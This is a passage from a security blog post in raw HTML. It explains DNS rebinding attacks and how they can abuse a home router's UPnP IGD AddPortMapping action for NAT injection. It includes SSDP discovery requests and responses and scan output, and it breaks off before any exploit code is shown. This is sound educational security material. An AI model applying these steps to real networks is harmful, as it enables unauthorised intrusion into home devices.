href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" target="_blank">Same Origin Policy (SOP)</a>, by <i>exploiting</i> the <i>DNS cache </i>of the browsers themselves.</p><p>An attacker, after a first phase in which the victims are induced to visit a malicious web page, tricks the users' browser by using a controlled DNS server. </p><p>This attack is normally used to compromise devices present in a local network in order to use them as relay points, bypassing the local network NAT trust boundary. Below a scheme showing a more detailed example and the related steps:</p></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVv0-6eE5P7JCaDRiRVhyphenhyphen7M9tTyKJhahPdWHo9_gaoORairZ9JSfsT6oznIjYrtsPzoncExOXZVIeYF0sd5RLpCopUUvivHjh0lc7MPZpABpHRLgkFw58ba1cqwd4b6B3a1C9eLGFg5F5n/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="734" data-original-width="891" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVv0-6eE5P7JCaDRiRVhyphenhyphen7M9tTyKJhahPdWHo9_gaoORairZ9JSfsT6oznIjYrtsPzoncExOXZVIeYF0sd5RLpCopUUvivHjh0lc7MPZpABpHRLgkFw58ba1cqwd4b6B3a1C9eLGFg5F5n/w640-h528/dnsr_diagram_2.png" width="640" /></a></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><span style="font-family: inherit;">In particular:</span></div><div style="text-align: left;"><ul style="text-align: left;"><li style="text-align: justify;">- The attacker sets up a <i>DNS service</i> for a <i>malicious domain</i>. </li><li style="text-align: justify;">- The attacker <i>tricks a victim</i> into accessing the controlled malicious domain. This step could be done using phishing techniques, such as Cross-Site Scripting, Content Manipulation or Social Network and Instant Messaging spam. </li><li style="text-align: justify;">- Victim's browser, by visiting the malicious domain, will make a query for that domain's DNS settings. </li><li style="text-align: justify;">- The malicious DNS server responds to the query with the actual IP address of the domain. </li></ul><span style="text-align: justify;">Meanwhile, victim's browser caches the returned IP address. </span><br /><ul style="text-align: left;"><li style="text-align: justify;">- Since the attacker has configured the <i>DNS Time-To-Live (TTL)</i> at the <b>lowest</b> possible value, when the cache retention time expires, the user's browser makes another DNS request for the same domain as it needs a <b>new IP address</b>. </li><li style="text-align: justify;">- The malicious DNS service, this time, responds with a private IP address, such as <b>192.168.1.1</b>, related to a device present inside the target private network. </li><li style="text-align: justify;">- At this point, in victim's browser, all origin-based security policies enforced by the Same Origin Policy are potentially bypassed as the address related to the initial origin has been compromised. Therefore, any JavaScript code previously loaded from the malicious website is now able to access to any HTTP resource locally exposed in LAN by the target device pointing to <b>192.168.1.1</b>.</li></ul></div><p style="text-align: justify;">Now, supposing a <i>Smart TV</i> as the subject of the <i>DNS Rebinding attack</i>, which behavior can be considered exposed to such attacks?</p><div style="text-align: left;"><p style="text-align: justify;">The <i>Smart TV</i> web server expects to receive requests with known and trusted values inside the HTTP “<b>Host</b>” header, for instance a legit request should contain “<b>Host: 192.168.1.53</b>”, where “<b>192.168.1.53</b>” is the IP address of the TV itself. A header such as “<b>Host: attacker.mindedsecurity.com</b>” should therefore raise a warning in the application.</p></div><p style="text-align: justify;">So, if the target device does not properly validate the “<b>Host</b>” header and it shows the same behavior with tampered values (i.e. the response is the same), <u>this can be considered as likely exploitable,via DNS Rebinding attacks</u>.</p><p style="text-align: justify;">The following sections describe a practical example of <u><i>DNS Rebinding attack against a home router.</i></u> </p><p style="text-align: justify;">In this first example, it will be shown how to exploit the <a href="https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html" target="_blank">IGD Profile</a> from UPnP protocol implemented by some routers, in order to perform a <a href="https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf" target="_blank">NAT Injection</a> attack. </p><p style="text-align: justify;">However, it should be considered that this is just one of the possible attack scenarios and that DNS Rebinding attack possibilities are limitless especially in the IoT era. </p><p></p></div><h3 style="text-align: left;">The UPnP Protocol</h3><div style="text-align: left;"><div style="text-align: justify;"><span id="docs-internal-guid-fe675ce5-7fff-80b5-a326-228397c1209b" style="font-family: inherit;"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="white-space: pre-wrap;">An interesting example of local service is <b>UPnP</b>, which is a <a href="https://tools.ietf.org/html/rfc6970" rel="nofollow" target="_blank">pretty old protocol</a> that is coming back from the past thanks to the growth of smart devices.
</span></p><p><span style="white-space: pre-wrap;">UPnP is a protocol designed to support automatic device discovery within a network without any configurations from the users. This way, for instance, a smart TV application can expose a UPnP service in a local network (e.g. a home network) in order to give to the user the opportunity to control the video player from his smartphone or other devices.</span></p><p></p><p><span style="white-space: pre-wrap;">The UPnP stack includes different protocols such as TCP, UDP, HTTP and SOAP and can be summarized as follows:</span></p><p></p><ol><li><span style="white-space: pre-wrap;">Discovery</span></li><li><span style="white-space: pre-wrap;">Description</span></li><li><span style="white-space: pre-wrap;">Control</span></li><li><span style="white-space: pre-wrap;">Eventing</span></li><li><span style="white-space: pre-wrap;">Presentation</span></li></ol><span><span style="white-space: pre-wrap;">Some of these layers are briefly described below, but for more details the <a href="http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf)" target="_blank">UPnP Device Architecture</a> specification could be considered.</span></span></span></div></div><div><h3 style="text-align: left;">Discovering UPnP devices & services inside a local network</h3><p style="text-align: justify;"><span id="docs-internal-guid-3bd62386-7fff-c672-fe32-0767029eac7d"><span style="font-family: inherit; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When a UPnP "client" (control point) is added to a local network, it starts looking for UPnP devices and services by using the SSDP (Simple Service Discovery Protocol) protocol: the control point performs a M-SEARCH HTTPU (HTTP over UDP) discovery request to a specific multicast address (239.255.255.250). All the listening devices will then reply with a unicast HTTPU response as shown in the following image.</span></span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdo16IlhDH_W0go1aPBWftN1QJAfwGdY4soFJWi7mltr1-F0wry9zSXtguKTpt3nVrZ2N6wsx3izN6fYPoOsTaX2Bel5AWBNjfki8YoZhfEpHuByuSGq9MAV4a15wrmsxenJPjozwM0VmT/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="634" data-original-width="602" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdo16IlhDH_W0go1aPBWftN1QJAfwGdY4soFJWi7mltr1-F0wry9zSXtguKTpt3nVrZ2N6wsx3izN6fYPoOsTaX2Bel5AWBNjfki8YoZhfEpHuByuSGq9MAV4a15wrmsxenJPjozwM0VmT/w608-h640/ssdp_diagram.png" width="608" /></a></div><p style="text-align: left;">Below the example of a SSDP request used to discover all the UPnP devices in a network:</p></div><div><div><div style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-error" style="box-sizing: border-box; color: red;">M-SEARCH * HTTP/1.1</span></span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">HOST:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 239.255.255.250:1900</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">MAN:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> "ssdp:discover"</span></span></pre><div style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">MX:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 1</span></span></pre></div><div style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">ST:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> ssdp:all</span></span></pre></div></div></div><p style="text-align: left;">Example of a SSDP response from a home router:</p></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #50e650;">200</span> OK</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">LOCATION:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> http://192.168.1.1:41952/RInc4AcPDaf/</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">EXT:</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">SERVER:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> POSIX, UPnP/1.0, Intel MicroStack/1.0.2777</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">USN:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> uuid:c6bbfad2-190b-4fcc-b0d9-fd63781a49ce::urn:schemas-upnp-org:service:ContentDirectory:1</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">CACHE-CONTROL:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> max-age=1800</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">ST:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> urn:schemas-upnp-org:service:ContentDirectory:1</span></span></pre></div><div><br /></div><div><div style="text-align: justify;"><span id="docs-internal-guid-14a6bf1c-7fff-0c4c-a1f9-42bf0aef5768"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">There are a lot of UPnP discovery tools available in the <a href="https://github.com/tenable/upnp_info" target="_blank">wild</a>. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; white-space: pre-wrap;">However, if you want to get your hands dirty in order to understand the UPnP protocol, just a few lines of code are necessary to perform the SSDP discovery.</span></p></span><p><span style="white-space: pre-wrap;"><span style="font-family: inherit;">The SSDP response contains information related to the location of the Device Description resource, which is usually pointed by a URL inside the LOCATION response header.</span></span></p><span><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">As shown below, the Device Description is an XML document that contains information related to the device itself, such as the name of the device or details related to the manufacturer, and the description of the services and actions exposed by the device.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p></span></div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpL0nCClaAsNbXYSUQa2L-R-gY0N0O1dNfc-yzX98T-PEt2DMy42RgiUOXuPG1IAxRvxod11Mu1n23fMrpc9EjcK61eUG5IGXUQ7U04WDOEzD-EoIE3NGDeD29GFQgnRlueZ4tNmInTpAR/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpL0nCClaAsNbXYSUQa2L-R-gY0N0O1dNfc-yzX98T-PEt2DMy42RgiUOXuPG1IAxRvxod11Mu1n23fMrpc9EjcK61eUG5IGXUQ7U04WDOEzD-EoIE3NGDeD29GFQgnRlueZ4tNmInTpAR/w640-h360/deviceDescription.png" width="640" /></a></div><p style="text-align: left;"><br /></p><p style="text-align: left;">In short, this XML file contains all the information we need to know in order to identify the available services.</p></div><div><h3 style="text-align: left;">The IGD Profile</h3><div style="text-align: left;"><p style="text-align: left;"></p><p style="text-align: justify;"><span style="font-family: inherit;">UPnP devices may implement custom profiles with custom services or use default ones. <br /></span><span style="font-family: inherit;">A common profile used by many routers is the <b>IGD profile,</b> which includes a set of subprofiles related to the router configuration such as the “<i>LANHostConfigManagement</i>”, used for managing network configuration parameters, or the “<i>WANIPConnection</i>” which, as already described in the “<a href="https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf" target="_blank">Universal Plug and Play IGD A Fox in the Hen House</a>" paper, exposes the "<i><b>AddPortMapping</b></i>" SOAP action that is particularly interesting from an attacker point of view.</span></p><p></p><p style="text-align: justify;">The “<b>AddPortMapping</b>” action is commonly used by other devices in the LAN to create new port mapping rules on the WAN interface of the router. </p><p style="text-align: justify;">However, an attacker may <i>exploit this action to inject arbitrary rows </i>in the port forwarding table in order to forward the traffic to other internal/external clients or to expose internal services externally, such as the router web administration interface.</p><p style="text-align: justify;">As we saw from the discovery process, usually, UPnP services could be exploited if the attacker has access to the same local network of the target UPnP device.<br /></p><p style="text-align: justify;">Here comes the <i>DNS Rebinding technique to the rescue</i>!</p><p></p></div><h3 style="text-align: left;">Attacking Vulnerable UPnP services via DNS Rebinding Attack</h3><p></p></div><div><div style="text-align: left;"><span id="docs-internal-guid-b950de10-7fff-b8f2-b525-9669ddc8fca4"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="white-space: pre-wrap;"><span style="font-family: inherit;">Therefore, it is now pretty clear why a router that implements the <b>IGD</b> Profile and does not perform the validation of the Host header is a perfect target for a DNS Rebinding attack.</span></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: inherit;"><span style="white-space: pre-wrap;"></span></span></p><p style="text-align: justify;"><span style="font-family: inherit;"><span style="font-family: inherit;">Below is reported the <i>SSDP response</i> of a router with the UPnP <i>IGD profile <b>enabled</b></i>. The scan was performed using a custom go script that basically performs the SSDP discovery process, reads the location of the Device Description resource and parses it in order to list also the services and actions available for a detected UPnP device. </span></span></p><p></p></span></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative; text-align: left;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Found Upnp device at <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">192</span>.168.1.1:1900</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Device Description (Location: http://192.168.1.1:5431/igdevicedesc.xml <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-</span>> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">200</span>)</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">PresentationURL: </span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">FriendlyName: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Manufacturer: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelDescription: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelName: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelNumber: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Getting devices list and related <span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">service</span> list</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">urn:schemas-upnp-org:device:InternetGatewayDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:Layer3Forwarding:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:Layer3Forwarding1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/Layer3Forwarding</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/Layer3Forwarding</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/layer3forwardingSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 